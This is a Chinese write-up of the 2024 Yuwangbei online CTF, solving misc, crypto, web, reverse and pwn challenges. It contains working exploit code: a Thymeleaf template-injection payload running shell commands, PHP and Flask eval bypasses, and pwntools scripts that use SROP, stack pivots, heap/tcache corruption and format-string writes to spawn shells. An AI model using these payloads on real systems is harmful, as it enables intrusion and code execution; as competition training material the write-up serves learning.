2024第八届御网杯线上赛Writeup

MISC

信息安全大赛的通知

flag{HNCTF9090AS9nbg87600hn77hn88}

编码转换

第一部分是brainfuck，解密得flag{ab71cda1

第二部分是jsfuck，解密得b495e13b3f21

第三部分是Ook，解密得f6fd50221978}

flag{ab71cda1b495e13b3f21f6fd50221978}

coding_analyse

html解码得936544a55314a7e4339545f47776a6e41315a7d41325743575655455b4478516a6537416

逆序后两次hex解码

hnci{JPEVHdu345680967709d5}

凯撒解密偏移两位

flag{HNCTFbs345680967709b5}

bluetooth

全局搜索flag，发现有个压缩包

提取出来，发现有flag.txt和key

flag:10004583275926070044326083910251708233320797779355779208703097816305188140191914132269450797
key:5216294695211820293806247029887026154798297270637676463374801674229881314620340407569315152

十进制转十六进制，逐位异或

flag_decimal = "10004583275926070044326083910251708233320797779355779208703097816305188140191914132269450797"
key_decimal = "5216294695211820293806247029887026154798297270637676463374801674229881314620340407569315152"


flag_hex_str = hex(int(flag_decimal))[2:] 
key_hex_str = hex(int(key_decimal))[2:]  


max_length = max(len(flag_hex_str), len(key_hex_str))
flag_hex_str = flag_hex_str.zfill(max_length)  
key_hex_str = key_hex_str.zfill(max_length)  


flag_bytes = bytes.fromhex(flag_hex_str)
key_bytes = bytes.fromhex(key_hex_str)


xor_result = bytes(f_byte ^ k_byte for f_byte, k_byte in zip(flag_bytes, key_bytes))


xor_hex_result = xor_result.hex()

flag_output = bytes.fromhex(xor_hex_result).decode('utf-8')

print(f"异或结果（十六进制）: {xor_hex_result}")
print(f"Flag: {flag_output}")

flag{66526827ff3ba85e1444a0df4acbba93}

CRYPTO

不小心

原题

https://blog.csdn.net/weixin_52640415/article/details/126627810

改下flag头

flag{78ada113e709fdf12a5aa4aa5dd62e33}

just math

利用SageMath解方程，再用RSA和Coppersmith解出剩下的flag

from sage.symbolic.relation import solve
from Crypto.Util.number import *


var_x = var('var_x')


y_list = [
    3149069, 2271689, 2337632, 3068562, 67697, 2337632, 3068562, 67697,
    2143547, 2543093, 1844472, 2206998, 67697, 1844472, 2686547, 2020317,
    67697, 3149069, 2271689, 2081324, 67697, 2143547, 2543093, 1844472,
    2206998, 67697, 2337632, 3068562, 67697, 2143547, 2543093, 1844472,
    2206998, 3752378
]


recovered_flag = ""


for value in y_list:
    eqn = 2 * var_x**3 + 2 * var_x**2 + 3 * var_x + 17 == value
    sol = solve(eqn, var_x)
    recovered_flag += chr(sol[2].rhs())  

print(recovered_flag)


flag_start = b"the flag is flag{"


modulus = 2260375559104345425590426977960386256287009777233277062625487017885931446911942921201492850167115455071935831283269948569220356763988762825230315520633702443866690239945242948370781975714325308306543337600783340792458991506685843729962897796956171467876531084194426101796617903015810156717396227079274786269217370618477266867389155551378798713259843750289765858717627925689021561352438080039804957145513478767641674644346609224034274906228784593435462413278410143
exp = 3
encrypted_flag = 1683427726786225271109289808778075351906457081282891335272956455076290407290946927840180672315908981114229434899424882579823897506730018911375238394076293908946844135295984336122170362703361647325169444373502665686779049846717305377396296752361918921007897449738856962248716579014267597667341690453460130215215256776249910808564677407383996700090361822122676428069577517468851642648993930679875398568383201032360229083338487146673018350740571719960730053254352184


R.<var_x> = PolynomialRing(Zmod(modulus))


for attempt in range(40):
    flag_high = bytes_to_long(flag_start + b"\x00" * 32 + b"}")
    poly_eq = (flag_high + var_x) ** exp - encrypted_flag
    small_solution = poly_eq.small_roots(X=256**attempt, beta=0.4, epsilon=0.05)

    if small_solution:  
        print(small_solution)
        decrypted_msg = flag_high + int(small_solution[0])
        print(long_to_bytes(decrypted_msg))

easy_crypto1

原题https://blog.csdn.net/luochen2436/article/details/128012748

脚本直接跑

import gmpy2
from Crypto.Util.number import getPrime, isPrime, bytes_to_long, long_to_bytes
from libnum import solve_crt

n1 = 21655617838358037895534605162358784326495251462447218485102155997156394132443891540203860915433559917314267455046844360743623050975083617915806922096697304603878134295964650430393375225792781804726292460923708890722827436552209016368047420993613497196059326374616217655625810171080545267058266278112647715784756433895809757917070401895613168910166812566545593405362953487807840539425383123369842741821260523005208479361484891762714749721683834754601596796707669718084343845276793153649005628590896279281956588607062999398889314240295073524688108299345609307659091936270255367762936542565961639163236594456862919813549
n2 = 24623016338698579967431781680200075706241014384066250660360949684385831604822817314457973559632215801205780786144608311361063622813017396858888436529116737754653067203843306015767091585697803364656624926853551997229897087731298797904208292585562517602132663331748784390752958757661484560335406769204491939879324079089140420467301773366050084810282369044622442784113688062220370531522036512803461607049619641336524486507388232280683726065679295742456158606213294533956580462863488082028563360006966912264908424680686577344549034033470952036766850596897062924137344079889301948258438680545785139118107899367307031396309
c1 = 2615722342860373905833491925692465899705229373785773622118746270300793647098821993550686581418882518204094299812033719020077509270290007615866572202192731169538843513634106977827187688709725198643481375562114294032637211892276591506759075653224150064709644522873824736707734614347484224826380423111005274801291329132431269949575630918992520949095837680436317128676927389692790957195674310219740918585437793016218702207192925330821165126647260859644876583452851011163136097317885847756944279214149072452930036614703451352331567857453770020626414948005358547089607480508274005888648569717750523094342973767148059329557
c2 = 6769301750070285366235237940904276375318319174100507184855293529277737253672792851212185236735819718282816927603167670154115730023644681563602020732801002035524276894497009910595468459369997765552682404281557968383413458466181053253824257764740656801662020120125474240770889092605770532420770257017137747744565202144183642972714927894809373657977142884508230107940618969817885214454558667008383628769508472963039551067432579488899853537410634175220583489733111861415444811663313479382343954977022383996370428051605169520337142916079300674356082855978456798812661535740008277913769809112114364617214398154457094899399
E1 = 377312346502536339265
E2 = 561236991551738188085
P = gmpy2.gcd(n1,n2)
Q2 = n2//P
Q1 = n1//P
c = [pow(c1, gmpy2.invert(E1 // 35, (P - 1) * (Q1 - 1)), n1),
     pow(c2, gmpy2.invert(E2 // 35, (P - 1) * (Q2 - 1)), n2)]
c3 = c[0]*c[1]%P
c2 = c[1] %Q2
c1 = c[0] %Q1
result = solve_crt([c1,c2,c3],[Q1,Q2,P])
phi = (Q1-1)*(Q2-1)
n = Q1*Q2
c_m = result % n
d = gmpy2.invert(7,phi)
m = pow(c_m,d,n)
flag = gmpy2.iroot(m,5)[0]
print(long_to_bytes(flag))

flag{27dab675-9e9b-4c1f-99ab-dd9fe49c190a}

Web

input_data

svn泄露

访问http://101.200.58.4:10005/.svn/pristine/57/57d4b4b90f7139cf064ee991e8f78bd8fc2a8a6d.svn-base

admin

Thymeleaf Fragment注入

网上找个payload直接打

__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22cat /flag%22).getInputStream()).next()%7d__::.x

如此多的FLAG

登录后发现

访问FLLL4g.php

 <?php
if (isset($_GET['X'])) {
    $temp = $_GET['X'];
    is_numeric($temp) ? die("no numeric") : NULL;
    if ($temp > 9999) {
        echo "Pupil.</br>";
    } else {
        die("NO!NO!NO!");
    }
}
else {
    die("Where is X?");
}

if (isset($_GET['Y'])) {
    $md5 = $_GET['Y'];
    if ($md5==md5($md5)) {
        echo "Junior school student.</br>";
    } else {
        die("NO!NO!NO!");
    }
}
else {
    die("Where is Y?");
}

if (isset($_GET['Z'])) {
    $content = $_GET['Z'];
    if (strlen($content) >= 60) {
        die("No long!");
    }
    $blacklist = [' ', '\'', '"', '`', '\[', '\]', '\{',  '}', '\t', '\r', '\n'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("NO!NO!NO!");
        }
    }
    $security = ['abs', 'base_convert', 'cos', 'dechex', 'exp', 'f1ag', 'getrandmax', 'hexdec', 'is_nan', 'log', 'max', 'octdec', 'pi', 'sin', 'tan'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $security)) {
            die("NO!NO!NO!");
        }
    }
    eval('echo '.$content.';');
    if(isset($f1ag)){
        if($f1ag == "flag"){
            echo "Senior high school student.</br>";
            echo "Here_is_flag!!!!!!!";
        }
    }
    else{
        echo "NO!NO!NO!";
    }

}
else {
    die("Where is Z?");
}
?> 

payload

X=10000e&Y=0e215962017&Z=base_convert(1751504350,10,36)(base_convert(784,10,36))

访问得flag

flask

from flask import Flask, request, Response
import random
import re

app = Flask(__name__)

@app.route('/')
def index():
    evalme = request.args.get('evalme')

    if ((not evalme) or re.search(r'[A-Zd-z\\. /*$#@!+^]', evalme)):
        return 'hacker?'

    with open(eval(evalme), 'rb') as f:
        return Response(f.read())


if __name__ == '__main__':
    app.run(port=8080)
    

ban了很多字符，通过格式化字符串间接读取/flag

?evalme="%c%c%c%c%c"%(47,102,108,97,103)

Reverse

ez_apk

对apk文件进行反编译,发现

资源处搜索cipher找到cipher和key

直接解密

def decrypt():
    # 解密的密钥
    key = "aptxcony"
    # 原始密文
    ciphertext = "f`vg\u007FvkXknxfznQv|gz|\u007F}c|G~bh{{x|\u007FVVFGX"

    # 解密步骤1：通过异或运算还原部分字符
    decrypted_chars = [chr(ord(ciphertext[i]) ^ i) for i in range(len(ciphertext))]

    # 将密文转为整数列表
    char_array = [ord(c) for c in decrypted_chars]

    # 存储最终解密后的字符
    decrypted_array = []

    # 解密步骤2：基于密钥进行字母偏移操作
    for i in range(len(char_array)):
        if chr(char_array[i]) in ['_', '{', '}']:
            decrypted_array.append(chr(char_array[i]))  # 保留特殊字符
        elif char_array[i] < ord('a') or char_array[i] > ord('z'):
            decrypted_array.append(chr(char_array[i]))  # 非小写字母直接保留
            break
        else:
            # 根据密钥对字母进行解密
            for j in range(ord('a'), ord('z') + 1):
                if char_array[i] == ((j - 97) + (ord(key[i % 8]) - 97)) % 26 + 97:
                    decrypted_array.append(chr(j))
                    break

    # 输出解密后的字符串
    decrypted_text = ''.join(decrypted_array)
    print(decrypted_text)

if __name__ == "__main__":
    decrypt()

机器猫

python的exe文件直接反编译，得到

fVJXNjE0ODBpM2RrZmNSVzYxNDgwaTNka01BSlVPe25oc20=

base64解密，逆序

mshn{OUJAMkd3i08416WRcfkd3i08416WR}

凯撒解密得到flag

flag{hnctfdw3b08416pkvydw3b08416pk}

文件分析

C++文件和对应的头文件

搜了下发现这题是原题，直接交网上的flag就可以

https://blog.csdn.net/weixin_52640415/article/details/123877043

flag{50_pr3TtYn_0}

CSMazeee

dnSpy打开

点100次xTEA加密创建迷宫

动调,使用udrl控制移动最后得到rdrrrrrddrruuurrrdddddllllllluull

48,48,42,42,42,42,42,42,48,48,48,48,10,10
42,48,48,48,48,48,48,42,48,42,42,48,10,10
42,42,42,42,42,42,48,42,48,42,42,48,10,10
42,42,49,48,48,42,48,48,48,42,42,48,10,10
42,42,42,42,48,42,42,42,42,42,42,48,10,10
42,42,42,42,48,48,48,48,48,48,48,48,10,10

最后得到flag：flag{4DC8EF9E2B5CABD955DC18BBC6A35B16}

Pwn

ASM

先检查一下保护

amd64位，保护基本上没开

ida打开看看

程序很简单，给了/bin/sh，并且返回地址是输入的地址

那么就可以通过构造rax为0xf来利用SROP拿shell

exp

from pwn import *
context(os='linux', arch='amd64', log_level='debug')

# Connection setup
io = process("./pwn")

# Addresses and gadgets
sh_pointer = 0x40200A  
syscall_address = 0x40102D
xor_gadget = 0x000000000040103D
shift_gadget = 0x0000000000401030  
move_gadget = 0x0000000000401034 

# SigreturnFrame setup
frame = SigreturnFrame()
frame.rax = 0x3b
frame.rdi = sh_pointer  
frame.rsi = 0x0
frame.rdx = 0x0
frame.rip = syscall_address

# Payload construction
payload = (
    p64(xor_gadget) + 
    p64(move_gadget) + 
    p64(shift_gadget) + 
    p64(move_gadget) + 
    p64(shift_gadget) + 
    p64(move_gadget) + 
    p64(shift_gadget) + 
    p64(move_gadget) + 
    p64(syscall_address) + 
    flat(frame)
)

# Send and interact
io.sendline(payload)
io.interactive()

ret

检查保护

ida64位打开

可以看到有格式化泄露地址，绕过随机数这个判断，再打溢出栈迁移攻击即可

from pwn import *

target = process('./ret')
# target = remote("101.200.58.4", 10004)

libc = ELF("./libc.so.6")
context(log_level='debug', os='linux', arch='amd64')

while True:
    target.sendafter("ask?", b'%3$p')
    target.recvuntil('\n')
    
    stack_address = int(target.recv(14), 16)
    libc_base = stack_address - 0x110031
    
    target.recvuntil("ok,")
    random_value = int(target.recv(3).strip())
    
    system_addr = libc_base + libc.sym['system']
    binsh_addr = libc_base + next(libc.search(b'/bin/sh\x00'))

    if random_value >= 0x90:
        puts_plt = e.plt['puts']
        puts_got = e.got['puts']
        gadget_pop_rdi = 0x0400923
        gadget_pop_rsi_r15 = 0x0400921
        read_func = 0x0400876
        bss_section = 0x601050
        gadget_leave = 0x04007f9
        gadget_ret = 0x04005e6
        
        payload1 = b'a' * 0x80 + p64(bss_section + 0x200 + 0x500) + p64(read_func)
        target.send(payload1)
        
        payload2 = p64(gadget_pop_rdi) + p64(binsh_addr) + p64(system_addr)
        payload2 += b'a' * (0x80 - 24) + p64(bss_section + 0x200 - 0x88 + 0x500) + p64(read_func)
        target.sendline(payload2)
        
        payload3 = b'a' * 0x20
        target.sendline(payload3)
        
        target.interactive()
        break
    else:
        print(f"Random value is {random_value}, restarting the process...")
        target.close()
        target = remote("101.200.58.4", 10004)

no fmtstr

通过创建堆块，首先泄露出 libc 和堆的地址。接着，使用 Latgebin 技巧攻击 tcache 的 mp 结构体，强制扩大 tcache 的容纳范围。随后，利用 UAF 漏洞将堆块放入 tcache，并修改其 fd 指针，从而实现对任意地址的申请与控制。最终，通过修改 printf 函数为后门函数，成功劫持程序执行流程。

from tools import *
from pwn import *

process_target = process('./fmstr')
# process_target = remote("101.200.58.4", 10004)

elf_file = ELF('./fmstr')
libc_file = ELF("./libc.so.6")
context(log_level='debug', os='linux', arch='amd64')

def create_entry(index, size):
    process_target.sendlineafter("note", b'1')
    process_target.sendlineafter("Index:", str(index))
    process_target.sendlineafter("Size:", str(size))

def remove_entry(index):
    process_target.sendlineafter("note", b'2')
    process_target.sendlineafter("Index:", str(index))

def update_entry(index, content):
    process_target.sendlineafter("note", b'3')
    process_target.sendlineafter("Index:", str(index))
    process_target.sendafter("Content:", content)

def display_entry(index):
    process_target.sendlineafter("note", b'4')
    process_target.sendlineafter("Index:", str(index))

create_entry(0, 0x540)
create_entry(1, 0x550)
create_entry(2, 0x530)
remove_entry(0)
display_entry(0)

stack_address = u64(process_target.recvuntil("\x7f")[-6:].ljust(8, b'\x00'))
libc_base = stack_address - 0x1f9cc0 + 0x3000
create_entry(3, 0x550)

update_entry(0, b'k' * 0x10)
display_entry(0)
process_target.recvuntil("kkkkkkkkkkkkkkkk")
leaked_heap_part = u32(process_target.recv(4))
heap_base = leaked_heap_part - 0x20a
heap_adjusted = heap_base + 0x290

mp_address = libc_base + 0x1F63B0
mp_adjusted = mp_address - 0x20 - 4
libc_chunk = libc_base + 0x1fa0f0 - 0x3000

update_entry(0, p64(libc_chunk) * 2 + p64(heap_adjusted) + p64(mp_adjusted))
remove_entry(2)
create_entry(4, 0x590)
create_entry(5, 0x590)
create_entry(6, 0x590)
remove_entry(5)
remove_entry(6)

heap_key = (heap_base + 0x2000) >> 0xc
backdoor_function = 0x4011D6
write_got = 0x404020
write_xor_key = write_got ^ heap_key
system_function = 0x4010A0 + 6

update_entry(6, p64(write_xor_key))
create_entry(7, 0x590)
create_entry(8, 0x590)
update_entry(8, p64(system_function) * 4 + p64(backdoor_function))

process_target.sendlineafter("note", b'4')
debug(process_target)
process_target.interactive()

normal pwn

arrch64位，格式化字符串漏洞

修改0x30寄存器为后门函数

from tools import *
from pwn import *
context(os='linux', arch='aarch64', log_level='debug')
libc = ELF('./libc-2.27.so')
process_args = ["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu", "-g", "1234", 'pfdata']
target_process = process(process_args)

elf = ELF('./pfdata')
debugarc(target_process, elf)

target_process.recvuntil("stderr ")
base_stack = int(target_process.recv(10), 16)
libc_base = base_stack - 0x155480

def add_entry(index, size):
    target_process.sendlineafter("Your choice:", "97")
    target_process.sendlineafter("index:", str(index))
    target_process.sendlineafter("size:", str(size))

def edit_entry(index, content):
    target_process.sendlineafter("Your choice:", "101")
    target_process.sendlineafter("index:", str(index))
    target_process.sendlineafter("content:", content)

def show_entry(index):
    target_process.sendlineafter("Your choice:", "115")
    target_process.sendlineafter("index:", str(index))

add_entry(0, 0x80)
edit_entry(0, b'+%7$p-%9$p') 
show_entry(0)

target_process.recvuntil("+")
leaked_stack = int(target_process.recv(12), 16)
target_process.recvuntil("-")
leaked_text = int(target_process.recv(12), 16)

text_base = leaked_text - 0xea0
system_func = text_base + 0x00D40 

log_addr('Base Stack Address', base_stack)
log_addr('Leaked Stack', leaked_stack)
log_addr('Libc Base Address', libc_base)
log_addr('Leaked Text', leaked_text)
log_addr('Text Base Address', text_base)
log_addr('System Function Address', system_func)

calculated_stack = leaked_stack
target_offset = calculated_stack % 0x10000 + 8
log_addr("Target Offset", target_offset)

format_payload = f'%{target_offset}c%25$hn'.encode()
edit_entry(0, format_payload)
show_entry(0)

system_payload = f"%{system_func % 0x10000}c%55$hn".encode()
edit_entry(0, system_payload)
show_entry(0)

target_process.interactive()